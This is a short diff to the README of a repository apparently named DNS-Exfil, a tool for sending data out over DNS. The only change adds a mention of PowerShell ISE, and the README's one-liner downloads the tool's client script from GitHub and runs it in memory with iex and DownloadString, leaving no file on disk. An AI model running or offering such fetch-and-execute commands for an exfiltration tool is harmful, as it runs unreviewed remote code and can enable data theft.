Stratiz/DNS-Exfil/README.md

 ### Downloading the script

-To download and run the client script without creating a temporary file you can use the following command:
+To download and run the client script without creating a temporary file you can use the following command in POWERSHELL ISE:

 ```powershell
 iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/Stratiz/DNS-Exfil/main/Client/UserScript.ps1'))